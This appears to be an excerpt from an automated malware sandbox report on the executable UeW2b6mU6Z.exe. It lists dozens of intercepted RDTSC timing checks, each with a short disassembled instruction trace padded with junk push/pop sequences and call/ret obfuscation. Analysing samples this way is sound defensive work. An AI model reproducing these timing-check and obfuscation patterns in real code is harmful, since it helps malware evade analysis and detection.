Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69A0C second address: E69A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F17B0FD5726h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69C3A second address: E69C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69D1B second address: E69D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD572Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A222 second address: E6A227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A227 second address: E6A22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A22C second address: E6A239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6AC33 second address: E6ACDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F17B0FD572Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F17B0FD5728h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov esi, edi 0x00000027 jmp 00007F17B0FD5735h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F17B0FD5728h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 cld 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F17B0FD5728h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jng 00007F17B0FD5737h 0x0000006e jmp 00007F17B0FD5731h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6AB07 second address: E6AB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6ACDB second address: E6ACE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6BD91 second address: E6BD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4B5 second address: E6B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4B9 second address: E6B4BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C8FA second address: E6C8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4BD second address: E6B4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F17B0EA9ABCh 0x0000000c jo 00007F17B0EA9AB6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F17B0EA9AB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C8FE second address: E6C913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F17B0FD572Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4DB second address: E6B4E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C913 second address: E6C9B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5738h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F17B0FD5728h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 call 00007F17B0FD5731h 0x00000029 jmp 00007F17B0FD572Eh 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F17B0FD5728h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e xor dword ptr [ebp+122D3228h], edx 0x00000054 pop esi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F17B0FD5732h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28E90 second address: E28EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28EA8 second address: E28EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28EB1 second address: E28EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6EA6B second address: E6EA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F17B0FD5736h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E72AA7 second address: E72AB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F17B0EA9AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E758FB second address: E75905 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E75905 second address: E7590B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7590B second address: E7591A instructions: 0x00000000 rdtsc 0x00000002 js 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E770D7 second address: E770DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E770DC second address: E7713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b jo 00007F17B0FD572Ch 0x00000011 sub dword ptr [ebp+122D2A06h], eax 0x00000017 cld 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F17B0FD5728h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D57FEh], edi 0x0000003b mov dword ptr [ebp+122D2A88h], eax 0x00000041 push 00000000h 0x00000043 jmp 00007F17B0FD572Eh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d pop eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7713E second address: E77143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E780F3 second address: E7815A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F17B0FD5728h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D2E87h] 0x00000019 push 00000000h 0x0000001b call 00007F17B0FD5730h 0x00000020 call 00007F17B0FD5734h 0x00000025 mov ebx, eax 0x00000027 pop ebx 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b mov di, ax 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jp 00007F17B0FD572Ch 0x00000037 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7815A second address: E78183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F17B0EA9AC8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7837D second address: E7838C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F17B0FD5726h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E79363 second address: E7936D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0EA9ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0BA second address: E7C0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0C0 second address: E7C0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0C5 second address: E7C0E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F17B0FD5728h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0FD572Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0E1 second address: E7C0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0E5 second address: E7C0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0EB second address: E7C0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0F1 second address: E7C0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C2A0 second address: E7C2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83658 second address: E83660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83660 second address: E83664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83664 second address: E8367D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F17B0FD572Dh 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E856E6 second address: E856F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E857F6 second address: E857FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8B177 second address: E8B18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0EA9AB6h 0x0000000a pop edi 0x0000000b je 00007F17B0EA9AC9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D81E second address: E8D871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007F17B0FD573Eh 0x0000000e jmp 00007F17B0FD572Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17B0FD572Eh 0x0000001a jmp 00007F17B0FD572Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D871 second address: E8D875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D875 second address: E8D87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8E23B second address: E8E257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917A8 second address: E917AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917AC second address: E917B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917B0 second address: E917BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F17B0FD5726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90EFC second address: E90F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F08 second address: E90F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F0C second address: E90F1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F17B0EA9AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F1A second address: E90F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F1E second address: E90F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E910AC second address: E910CA instructions: 0x00000000 rdtsc 0x00000002 js 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F17B0FD5734h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91336 second address: E9133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9133C second address: E91340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91340 second address: E91350 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F17B0EA9ABAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91350 second address: E91361 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F17B0FD5726h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95606 second address: E95610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95610 second address: E95614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9570B second address: E9570F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9570F second address: E95725 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0FD572Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95725 second address: E95729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95729 second address: E95738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95877 second address: E958CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F17B0EA9AB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F17B0EA9AC4h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F17B0EA9AC1h 0x0000001d push ecx 0x0000001e jne 00007F17B0EA9AB6h 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F17B0EA9AC2h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E958CE second address: E958D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C831 second address: E9C85C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0EA9AC0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1ED07 second address: E1ED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9BBBF second address: E9BBDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC5h 0x00000007 jg 00007F17B0EA9ABEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9BFE2 second address: E9BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C111 second address: E9C128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F17B0EA9AB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jng 00007F17B0EA9AB6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C680 second address: E9C69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F17B0FD5726h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F17B0FD572Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C69D second address: E9C6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA384E second address: EA3852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA3852 second address: EA3878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0EA9ABBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA6FE8 second address: EA6FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7394A second address: E7395F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73A81 second address: E73A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73C47 second address: E73C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73C90 second address: E73CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F17B0FD5731h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F17B0FD5728h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 xor dword ptr [ebp+12492BF3h], ebx 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
